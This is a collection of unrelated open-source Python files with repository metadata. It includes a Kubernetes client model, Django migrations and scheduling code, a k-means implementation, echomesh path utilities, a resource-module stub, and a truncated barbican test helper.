597dd9d514517fbd656459a07921c530ef9f056d
|
[] |
no_license
|
mbohlool/k8s-python-client
|
56d569071326820ebb5e11319ca230a272282a56
|
e083a1991e03f05d69a39f43b02b9bd5ede0a2b7
|
refs/heads/master
| 2021-01-09T20:29:17.339112
| 2016-08-18T23:16:49
| 2016-08-18T23:16:49
| 65,772,328
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,235
|
py
|
# coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class V1beta1IngressList(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
V1beta1IngressList - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'api_version': 'str',
'items': 'list[V1beta1Ingress]',
'kind': 'str',
'metadata': 'UnversionedListMeta'
}
self.attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
@property
def api_version(self):
"""
Gets the api_version of this V1beta1IngressList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#resources
:return: The api_version of this V1beta1IngressList.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1beta1IngressList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#resources
:param api_version: The api_version of this V1beta1IngressList.
:type: str
"""
self._api_version = api_version
@property
def items(self):
"""
Gets the items of this V1beta1IngressList.
Items is the list of Ingress.
:return: The items of this V1beta1IngressList.
:rtype: list[V1beta1Ingress]
"""
return self._items
@items.setter
def items(self, items):
"""
Sets the items of this V1beta1IngressList.
Items is the list of Ingress.
:param items: The items of this V1beta1IngressList.
:type: list[V1beta1Ingress]
"""
self._items = items
@property
def kind(self):
"""
Gets the kind of this V1beta1IngressList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#types-kinds
:return: The kind of this V1beta1IngressList.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1beta1IngressList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: http://releases.k8s.io/HEAD/docs/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1beta1IngressList.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1beta1IngressList.
:return: The metadata of this V1beta1IngressList.
:rtype: UnversionedListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1beta1IngressList.
:param metadata: The metadata of this V1beta1IngressList.
:type: UnversionedListMeta
"""
self._metadata = metadata
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"mehdy@google.com"
] |
mehdy@google.com
|
e6265d295615293256a409e7286b429a02cc5609
|
61747f324eaa757f3365fd7bf5ddd53ea0db47d1
|
/casepro/contacts/migrations/0001_initial.py
|
6d0a371e168bc8f557ce07d0e5145cb99d59cf58
|
[
"BSD-3-Clause"
] |
permissive
|
BlueRidgeLabs/casepro
|
f8b0eefa8f961dd2fdb5da26a48b619ebc1f8c12
|
8ef509326f3dfa80bb44beae00b60cc6c4ac7a24
|
refs/heads/master
| 2022-01-24T09:01:18.881548
| 2017-12-05T18:46:05
| 2017-12-05T18:49:42
| 113,502,588
| 0
| 0
| null | 2017-12-07T21:57:37
| 2017-12-07T21:57:37
| null |
UTF-8
|
Python
| false
| false
| 3,306
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orgs', '0014_auto_20150722_1419'),
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('uuid', models.CharField(unique=True, max_length=36)),
('name', models.CharField(help_text='The name of this contact', max_length=128, null=True, verbose_name='Full name', blank=True)),
('language', models.CharField(help_text='Language for this contact', max_length=3, null=True, verbose_name='Language', blank=True)),
('is_active', models.BooleanField(default=True, help_text='Whether this contact is active')),
('created_on', models.DateTimeField(help_text='When this contact was created', auto_now_add=True)),
],
),
migrations.CreateModel(
name='Field',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('key', models.CharField(max_length=36, verbose_name='Key')),
('label', models.CharField(max_length=36, null=True, verbose_name='Label')),
('org', models.ForeignKey(related_name='fields', verbose_name='Organization', to='orgs.Org')),
],
),
migrations.CreateModel(
name='Group',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('uuid', models.CharField(unique=True, max_length=36)),
('name', models.CharField(max_length=64)),
('is_active', models.BooleanField(default=True, help_text='Whether this group is active')),
('created_on', models.DateTimeField(help_text='When this group was created', auto_now_add=True)),
('org', models.ForeignKey(related_name='new_groups', verbose_name='Organization', to='orgs.Org')),
],
),
migrations.CreateModel(
name='Value',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('string_value', models.TextField(help_text='The string value or string representation of this value', max_length=640, null=True)),
('contact', models.ForeignKey(related_name='values', to='contacts.Contact')),
('field', models.ForeignKey(to='contacts.Field')),
],
),
migrations.AddField(
model_name='contact',
name='groups',
field=models.ManyToManyField(related_name='contacts', to='contacts.Group'),
),
migrations.AddField(
model_name='contact',
name='org',
field=models.ForeignKey(related_name='new_contacts', verbose_name='Organization', to='orgs.Org'),
),
migrations.AlterUniqueTogether(
name='field',
unique_together=set([('org', 'key')]),
),
]
|
[
"rowanseymour@gmail.com"
] |
rowanseymour@gmail.com
|
796b55262c5939d604def2ffdc5807697e8ce051
|
26eb818572061109b55e498ab4f123a4ff9b9499
|
/Stochastic_Evolutionary_Game/Stochastic_Game_Nowak_Code/Prisoners_Dilemma_Game/Matlab_Version/data.py
|
80b1c7a3ca6a564a7c4dd0b6db60554e709bee0a
|
[] |
no_license
|
Dcomplexity/Researches
|
550e49b5a5951dca11df062aae1f86e2c12945c5
|
4eb55e2550970223c2f4006d289d8f4ba70a611a
|
refs/heads/master
| 2022-04-04T02:13:56.976901
| 2020-02-01T14:34:44
| 2020-02-01T14:34:44
| 147,739,403
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 339
|
py
|
import pylab
import scipy.io as scio
data = scio.loadmat('Coop_Time')
coopS = data['ans'][0]
coop1 = data['ans'][1]
coop2 = data['ans'][2]
pylab.figure()
pylab.title('Cooperation Rate with Time')
pylab.xlabel('Time')
pylab.ylabel('Cooperation Fraction')
pylab.plot(coopS, 'k')
pylab.plot(coop1, 'r')
pylab.plot(coop2, 'g')
pylab.show()
|
[
"cdengcnc@sjtu.edu.cn"
] |
cdengcnc@sjtu.edu.cn
|
4b6cbd25b8649a1363aba2a0743f9bef3b0bf588
|
6b6bd222658ab11b51afc27d507abf4ef7d8e57b
|
/chapter6/kmeans.py
|
72b173ecb14ac98ea75d4c245148844914a34c87
|
[] |
no_license
|
JessicaFeng0926/classic_computer_science_problems
|
2347851f051e6e2afb2340258d5bf2d0a20e1571
|
68e44f4569a774553b763685050101357124d4a5
|
refs/heads/master
| 2022-11-13T16:29:45.396010
| 2020-07-08T02:11:04
| 2020-07-08T02:11:04
| 274,041,806
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,792
|
py
|
from __future__ import annotations
from typing import TypeVar, Generic, List, Sequence, Optional
from copy import deepcopy
from functools import partial
from random import uniform
from statistics import mean, pstdev
from dataclasses import dataclass
from data_point import DataPoint
def zscores(original: Sequence[float]) -> List[float]:
avg: float = mean(original)
std: float = pstdev(original)
if std == 0:
return [0]*len(original)
return [(x-avg)/std for x in original]
Point = TypeVar('Point', bound=DataPoint)
class KMeans(Generic[Point]):
def __init__(self, k: int, points: List[Point], initial_centroids: Optional[List[Point]]=None) -> None:
# 簇的数量不能为0,也不能为负数
if k<1 :
raise ValueError('k must be >= 1')
self._points: List[Point] = points
self._zscore_normalize()
# 初始化空簇
self._clusters: List[KMeans.Cluster] = []
if initial_centroids is None:
for _ in range(k):
# 选择随机中心点
rand_point: DataPoint = self._random_point()
# 用选出的这个随机中心点聚集起一个簇来
# 目前簇只有中心点,没有其他的成员点
cluster: KMeans.Cluster = KMeans.Cluster([],rand_point)
self._clusters.append(cluster)
else:
if len(initial_centroids) != k:
raise ValueError('The number of centroids must be k')
for i in range(k):
# 选择对应的中心点
centroid: DataPoint = initial_centroids[i]
# 用给定的这个中心点聚集起一个簇来
# 目前簇只有中心点,没有其他的成员点
cluster: KMeans.Cluster = KMeans.Cluster([],centroid)
self._clusters.append(cluster)
@property
def _centroids(self) -> List[DataPoint]:
return [x.centroid for x in self._clusters]
def _dimension_slice(self,dimension: int) -> List[float]:
return [x.dimensions[dimension] for x in self._points]
def _zscore_normalize(self) -> None:
zscored: List[List[float]] = [[] for _ in range(len(self._points))]
for dimension in range(self._points[0].num_dimensions):
dimension_slice: List[float] = self._dimension_slice(dimension)
for index, zscore in enumerate(zscores(dimension_slice)):
zscored[index].append(zscore)
for i in range(len(self._points)):
self._points[i].dimensions = tuple(zscored[i])
def _random_point(self) -> DataPoint:
'''对所有点来说,每个维度都取这些点提供的范围内的一个随机值,组成一个随机点'''
rand_dimensions: List[float] = []
for dimension in range(self._points[0].num_dimensions):
values: List[float] = self._dimension_slice(dimension)
rand_value: float = uniform(min(values),max(values))
rand_dimensions.append(rand_value)
return DataPoint(rand_dimensions)
def _assign_clusters(self) -> None:
'''给数据点寻找最近的中心点,并把数据点分到那个簇里'''
for point in self._points:
closest: DataPoint = min(self._centroids,
key=partial(DataPoint.distance,point))
idx: int = self._centroids.index(closest)
cluster: KMeans.Cluster = self._clusters[idx]
cluster.points.append(point)
def _generate_centroids(self) -> None:
'''找到每个簇的中心,并把中心点换成它'''
for cluster in self._clusters:
# 如果当前的簇还没有数据点,那就先不管它
if len(cluster.points) == 0:
continue
# 保存所有点在每个维度的平均值
means: List[float] = []
for dimension in range(cluster.points[0].num_dimensions):
dimension_slice: List[float] = [p.dimensions[dimension] for p in cluster.points]
means.append(mean(dimension_slice))
# 用这些平均值构造一个新点做中心点
cluster.centroid = DataPoint(means)
def run(self,max_iterations:int = 100) -> List[KMeans.Cluster]:
for iteration in range(max_iterations):
for cluster in self._clusters:
# 清空上一轮每个簇里的点
cluster.points.clear()
# 重新给点分簇
self._assign_clusters()
# 保存当前的中心点
old_centroids: List[DataPoint] = deepcopy(self._centroids)
# 生成新的中心点
self._generate_centroids()
# 如果两轮的中心点一样,说明已经稳定下来
# 当前的中心点就是最好的中心点,返回当前的簇
if old_centroids == self._centroids:
print(f'Converged after {iteration} iterations')
return self._clusters
# 迭代次数耗尽之后,返回当前的簇
return self._clusters
@dataclass
class Cluster:
points: List[Point]
centroid: DataPoint
if __name__ == '__main__':
point1: DataPoint = DataPoint([2.0,1.0,1.0])
point2: DataPoint = DataPoint([2.0,2.0,5.0])
point3: DataPoint = DataPoint([3.0,1.5,2.5])
kmeans_test: KMeans[DataPoint] = KMeans(2, [point1,point2,point3])
test_clusters: List[KMeans.Cluster] = kmeans_test.run()
for index, cluster in enumerate(test_clusters):
print(f'Cluster {index}: {cluster.points}')
|
[
"hasayake.hi@163.com"
] |
hasayake.hi@163.com
|
71cfbf8a60c7c3ba6f029a3dbb93bebf0062f36d
|
99a83749bc5976d78acb2eaa43139662a52629d4
|
/msked/placements/utils_old.py
|
73ea061533d9d83cf90c722c21b3c623905a9774
|
[] |
no_license
|
tommydangerous/msked
|
16856ca484a98f0aa5785bc37355c33b436c6c37
|
681f48c386da17da64abbb24565efcce4cc0f10d
|
refs/heads/master
| 2020-04-16T15:15:57.992175
| 2013-11-07T06:37:16
| 2013-11-07T06:37:16
| 8,272,061
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,445
|
py
|
from collections import defaultdict
from django.conf import settings
from django.db.models import Q
from employees.models import Employee
from employees.utils import tier_lab_sum, tier_lab_balance_check
from random import shuffle
from tasks.utils import task_check
from undos.models import Undo
from works.utils import work_check
def set_placements(schedule):
employees = list(schedule.employees())
# the tier lab sum of all employees
total_tier = sum([e.tier_lab for e in employees])
# work locations for this schedule
locations = sorted(schedule.locations(),
key=lambda l: l.occupancy, reverse=True)
# create dictionary with empty list for each location
location_dict = defaultdict(list)
for location in locations:
location_dict[location] = []
# if schedule has at least 1 location with an occupancy number
if locations and locations[0].occupancy:
first_loc = locations[0]
second_loc = locations[1]
# separate location exclusive employees
exl_emp = first_loc.exclusive_employees()
exl_pks = [e.pk for e in exl_emp]
employees = [e for e in employees if e.pk not in exl_pks]
# minimum tier level required for first work location
min_tier = first_loc.occupancy/float(len(employees)) * total_tier
loop_counter = 0
loop_max = settings.LOOP_MAX
work_check(schedule)
# keep shuffling until the tier levels are balanced in all locations
# or until the script has looped over itself 1000 times
while not location_dict[first_loc] and loop_counter < loop_max:
shuffle(employees)
needed = first_loc.occupancy - len(exl_emp)
first_emp = employees[:needed]
second_emp = employees[needed:]
temp = task_check(schedule, first_emp, second_emp)
if temp:
location_dict[first_loc] = temp[0] + exl_emp
location_dict[second_loc] = temp[1]
else:
loop_counter = loop_max
break
loop_counter += 1
print 'Set placement loop counter: %s' % loop_counter
if loop_counter < loop_max:
for location in locations:
for employee in location_dict[location]:
# create employee placements for location
employee.placement_set.create(location=location)
Undo.objects.create(location=location)
return loop_counter
else:
return False
def switch_placements(schedule):
all_employees = Employee.objects.exclude(vacation=True)
excludes = schedule.exclude_set.all()
if excludes:
# exclude employees on certain teams
for exclude in excludes:
all_employees = all_employees.exclude(team=exclude.team)
all_employees = list(all_employees)
# work locations for this schedule
locations = sorted(schedule.locations(),
key=lambda l: l.occupancy, reverse=True)
if len(locations) >= 2:
# check to see if employees are placed at both locations
first_loc = locations[0]
second_loc = locations[1]
if not first_loc.current_employees() and not (
second_loc.current_employees()):
return set_placements(schedule)
else:
# create dictionary with empty list for each location
location_dict = defaultdict(list)
# previous location dictionary
prev_dict = defaultdict(list)
for location in locations:
location_dict[location] = []
# store the location's previous employees
prev_dict[location] = (
[e for e in location.current_employees() if not (
e.vacation)])
employees = prev_dict[first_loc] + prev_dict[second_loc]
# check to see if any employees came back from vacation
new_extra = [e for e in all_employees if e not in employees]
# the tier lab sum of all employees
total_tier = sum([e.tier_lab for e in employees])
for employee in new_extra:
if employee.current_location():
# place them at their last worked location
prev_dict[employee.current_location].append(employee)
else:
# place them in the second location
prev_dict[second_loc].append(employee)
if first_loc.occupancy:
# minimum tier level required for first work location
min_tier = first_loc.occupancy/float(len(
employees)) * total_tier
loop_counter = 0
loop_max = settings.LOOP_MAX
# check to see if there are enough employees left to
# work at each job for the week
work_check(schedule)
# separate location exclusive employees
exl_emp = first_loc.exclusive_employees()
exl_pks = [e.pk for e in exl_emp]
while not location_dict[first_loc] and loop_counter < loop_max:
prev_femp = prev_dict[first_loc]
prev_femp = [e for e in prev_femp if e.pk not in exl_pks]
prev_semp = prev_dict[second_loc]
temp = task_check(schedule, prev_femp, prev_semp)
if temp:
location_dict[first_loc] = temp[0] + exl_emp
location_dict[second_loc] = temp[1]
else:
loop_counter = loop_max
break
loop_counter += 1
print 'Switch placement loop counter: %s' % loop_counter
if loop_counter < loop_max:
for location in locations:
for employee in location_dict[location]:
# create employee placements for location
employee.placement_set.create(location=location)
Undo.objects.create(location=location)
return loop_counter
else:
return False
|
[
"quantumventuress@gmail.com"
] |
quantumventuress@gmail.com
|
c484c984aa678a25c17ee8984e4c160b9abfbc25
|
feea5b7e71dbcc491dc9fe9b1686b5c13949369e
|
/mods/channels/__init__.py
|
21139372dfe1438fafc7a060196c47bd3261c615
|
[] |
no_license
|
IsmaelRLG/UserBot
|
232660971f98db1838263f821f40f0c879f00030
|
1ed21d0c0274c022b0de66ecc48547d9dab8be2b
|
refs/heads/master
| 2021-01-17T07:08:13.342496
| 2016-03-11T19:08:30
| 2016-03-11T19:08:30
| 39,799,613
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,260
|
py
|
# -*- coding: utf-8 -*-
"""
UserBot module
Copyright 2015, Ismael R. Lugo G.
"""
import channels
reload(channels)
from sysb import commands
from channels import lang
from channels import _
commands.addHandler('channels', 'chan register( (?P<channel>[^ ]+))?', {
'sintax': 'chan register <channel>?',
'example': 'chan register #Foo',
'desc': _('registra un canal en el bot', lang)},
registered=True,
logged=True,
channels=True,
chan_reqs='channel')(channels.register)
commands.addHandler('channels', 'chan flags( (?P<channel>#[^ ]+))? (?P<target>['
'^ ]+) (?P<flags>[^ ]+)', {
'sintax': 'chan flags <channel>? <target> <flags>',
'example': 'chan flags #Foo-chan foo-user OP',
'desc': _('(añade / elimina / edita / muestra) los flags', lang)},
registered=True,
logged=True,
channels=True,
chn_registered=True,
privs='s',
chan_reqs='channel')(channels.flags)
commands.addHandler('channels', 'chan drop( (?P<channel>#[^ ]+))?', {
'sintax': 'chan drop <channel>?',
'example': 'chan drop #foo',
'desc': _('elimina un canal del bot', lang)},
registered=True,
logged=True,
channels=True,
chn_registered=True,
privs='F',
chan_reqs='channel')(channels.drop)
|
[
"ismaelrlgv@gmail.com"
] |
ismaelrlgv@gmail.com
|
42262be31f9c9c5961d6f718490d0a8e36264f3f
|
52f8ac63714421e1930d7b90cb8200bb24d6ac42
|
/milove/shop/migrations/0011_auto_20170914_1954.py
|
a24d6b8e68833b9780ce5f3322a7f656ff9f7926
|
[] |
no_license
|
richardchien/milove-backend
|
ccc7afa17e88b17199ad3878b9315e12c2af8ef1
|
0310f2a60ebcbc3143d0aedcc6cb5842ba264a43
|
refs/heads/master
| 2023-07-06T12:45:13.622032
| 2017-10-02T04:40:00
| 2017-10-02T04:40:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 876
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-09-14 11:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('shop', '0010_auto_20170911_1831'),
]
operations = [
migrations.AddField(
model_name='payment',
name='type',
field=models.CharField(choices=[('standard', 'PaymentType|standard'), ('recharge', 'PaymentType|recharge')], default='standard', max_length=20, verbose_name='type'),
),
migrations.AlterField(
model_name='payment',
name='order',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='payments', to='shop.Order', verbose_name='order'),
),
]
|
[
"richardchienthebest@gmail.com"
] |
richardchienthebest@gmail.com
|
d2ff44c7f4f8ddc697ff528d785f404eda63cd11
|
64c8d431c751b1b7a7cb7224107ee40f67fbc982
|
/code/python/echomesh/base/Path.py
|
f72ecbc1483d9983735ec38c6681592f9d32e01b
|
[
"MIT"
] |
permissive
|
silky/echomesh
|
6ac4755e4ff5ea3aa2b2b671c0979068c7605116
|
2fe5a00a79c215b4aca4083e5252fcdcbd0507aa
|
refs/heads/master
| 2021-01-12T20:26:59.294649
| 2013-11-16T23:29:05
| 2013-11-16T23:29:05
| 14,458,268
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,625
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.base import MakeEmptyProject
from echomesh.base import Platform
import getpass
import os
import os.path
import sys
ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES = True
# If this is True, you want Echomesh to use its own external packages in
# preference to any you might have installed in your system path.
CODE_PATH = os.path.abspath(sys.path[0])
EXTERNAL_CODE_PATH = os.path.join(CODE_PATH, 'external')
ECHOMESH_PATH = os.path.dirname(os.path.dirname(CODE_PATH))
BINARY_PATH = os.path.join(ECHOMESH_PATH, 'bin', Platform.PLATFORM)
PROJECT_PATH = None
COMMAND_PATH = None
ASSET_PATH = None
_REQUIRED_DIRECTORIES = 'asset', 'cache', 'command', 'log'
def _possible_project(path):
for d in _REQUIRED_DIRECTORIES:
if not os.path.exists(os.path.join(path, d)):
return False
return True
def set_project_path(project_path=None, show_error=True, prompt=True):
original_path = os.path.abspath(os.path.expanduser(project_path or os.curdir))
path = original_path
global PROJECT_PATH, COMMAND_PATH, ASSET_PATH
while not _possible_project(path):
p = os.path.dirname(path)
if p != path:
path = p
continue
if prompt:
if MakeEmptyProject.ask_to_make_empty_project(original_path):
path = original_path
break
else:
PROJECT_PATH = None
return False
if show_error:
print("\nYour path %s isn't in an echomesh project." % original_path)
print("Defaulting to the echomesh path %s." % ECHOMESH_PATH)
path = ECHOMESH_PATH
break
PROJECT_PATH = path
COMMAND_PATH = os.path.join(path, 'command')
ASSET_PATH = os.path.join(path, 'asset')
os.chdir(path)
return True
set_project_path()
def info():
return {
'Asset path': ASSET_PATH,
'Code path': CODE_PATH,
'Command path': COMMAND_PATH,
'External code path': EXTERNAL_CODE_PATH,
'Project path': PROJECT_PATH,
'echomesh path': ECHOMESH_PATH,
}
def fix_sys_path():
for path in EXTERNAL_CODE_PATH, BINARY_PATH:
if path not in sys.path:
if ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES:
sys.path.insert(1, path)
else:
sys.path.append(path)
_HOME_VARIABLE_FIXED = False
# HACK!
def fix_home_directory_environment_variable():
if Platform.PLATFORM == Platform.DEBIAN:
global _HOME_VARIABLE_FIXED
if not _HOME_VARIABLE_FIXED:
# If running as root, export user pi's home directory as $HOME.
if getpass.getuser() == 'root':
os.environ['HOME'] = '/home/pi'
_HOME_VARIABLE_FIXED = True
|
[
"tom@swirly.com"
] |
tom@swirly.com
|
07ffac3ce1e2a9ef29d17775d50bc2c6979df431
|
3f6c16ea158a8fb4318b8f069156f1c8d5cff576
|
/.PyCharm2019.1/system/python_stubs/1707563220/resource.py
|
cfb221481b898c344ab21274ba2bd7f905e9409f
|
[] |
no_license
|
sarthak-patidar/dotfiles
|
08494170d2c0fedc0bbe719cc7c60263ce6fd095
|
b62cd46f3491fd3f50c704f0255730af682d1f80
|
refs/heads/master
| 2020-06-28T23:42:17.236273
| 2019-10-01T13:56:27
| 2019-10-01T13:56:27
| 200,369,900
| 0
| 0
| null | 2019-08-03T12:56:33
| 2019-08-03T11:53:29
|
Shell
|
UTF-8
|
Python
| false
| false
| 5,485
|
py
|
# encoding: utf-8
# module resource
# from /usr/lib/python3.6/lib-dynload/resource.cpython-36m-x86_64-linux-gnu.so
# by generator 1.147
# no doc
# no imports
# Variables with simple values
RLIMIT_AS = 9
RLIMIT_CORE = 4
RLIMIT_CPU = 0
RLIMIT_DATA = 2
RLIMIT_FSIZE = 1
RLIMIT_MEMLOCK = 8
RLIMIT_MSGQUEUE = 12
RLIMIT_NICE = 13
RLIMIT_NOFILE = 7
RLIMIT_NPROC = 6
RLIMIT_OFILE = 7
RLIMIT_RSS = 5
RLIMIT_RTPRIO = 14
RLIMIT_RTTIME = 15
RLIMIT_SIGPENDING = 11
RLIMIT_STACK = 3
RLIM_INFINITY = -1
RUSAGE_CHILDREN = -1
RUSAGE_SELF = 0
RUSAGE_THREAD = 1
# functions
def getpagesize(*args, **kwargs): # real signature unknown
pass
def getrlimit(*args, **kwargs): # real signature unknown
pass
def getrusage(*args, **kwargs): # real signature unknown
pass
def prlimit(*args, **kwargs): # real signature unknown
pass
def setrlimit(*args, **kwargs): # real signature unknown
pass
# classes
class error(Exception):
""" Base class for I/O related errors. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
characters_written = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
errno = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""POSIX exception code"""
filename = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception filename"""
filename2 = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""second exception filename"""
strerror = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception strerror"""
class struct_rusage(tuple):
"""
struct_rusage: Result from getrusage.
This object may be accessed either as a tuple of
(utime,stime,maxrss,ixrss,idrss,isrss,minflt,majflt,
nswap,inblock,oublock,msgsnd,msgrcv,nsignals,nvcsw,nivcsw)
or via the attributes ru_utime, ru_stime, ru_maxrss, and so on.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
ru_idrss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""unshared data size"""
ru_inblock = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""block input operations"""
ru_isrss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""unshared stack size"""
ru_ixrss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""shared memory size"""
ru_majflt = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""page faults requiring I/O"""
ru_maxrss = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""max. resident set size"""
ru_minflt = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""page faults not requiring I/O"""
ru_msgrcv = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""IPC messages received"""
ru_msgsnd = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""IPC messages sent"""
ru_nivcsw = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""involuntary context switches"""
ru_nsignals = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""signals received"""
ru_nswap = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""number of swap outs"""
ru_nvcsw = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""voluntary context switches"""
ru_oublock = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""block output operations"""
ru_stime = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""system time used"""
ru_utime = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""user time used"""
n_fields = 16
n_sequence_fields = 16
n_unnamed_fields = 0
# variables with complex values
__loader__ = None # (!) real value is '<_frozen_importlib_external.ExtensionFileLoader object at 0x7fdd7a975898>'
__spec__ = None # (!) real value is "ModuleSpec(name='resource', loader=<_frozen_importlib_external.ExtensionFileLoader object at 0x7fdd7a975898>, origin='/usr/lib/python3.6/lib-dynload/resource.cpython-36m-x86_64-linux-gnu.so')"
|
[
"sarthakpatidar15@gmail.com"
] |
sarthakpatidar15@gmail.com
|
38b4d90fe79dceeac78c45f1b1931845c7c16df1
|
f62fd455e593a7ad203a5c268e23129473d968b6
|
/python-barbicanclient-4.2.0/functionaltests/cli/v1/behaviors/secret_behaviors.py
|
783db8bcdceadd3bb8c49600d77926bb52b65eca
|
[
"Apache-2.0"
] |
permissive
|
MinbinGong/OpenStack-Ocata
|
5d17bcd47a46d48ff9e71e2055f667836174242f
|
8b7650128cfd2fdf5d6c8bc4613ac2e396fb2fb3
|
refs/heads/master
| 2021-06-23T05:24:37.799927
| 2017-08-14T04:33:05
| 2017-08-14T04:33:05
| 99,709,985
| 0
| 2
| null | 2020-07-22T22:06:22
| 2017-08-08T15:48:44
|
Python
|
UTF-8
|
Python
| false
| false
| 4,527
|
py
|
# Copyright (c) 2015 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import base_behaviors
class SecretBehaviors(base_behaviors.BaseBehaviors):
def __init__(self):
super(SecretBehaviors, self).__init__()
self.LOG = logging.getLogger(type(self).__name__)
self.secret_hrefs_to_delete = []
def update_secret(self,
secret_href,
payload):
"""Update a secret
:param secret_href the href to the secret to update.
:param payload the payload to put into the secret.
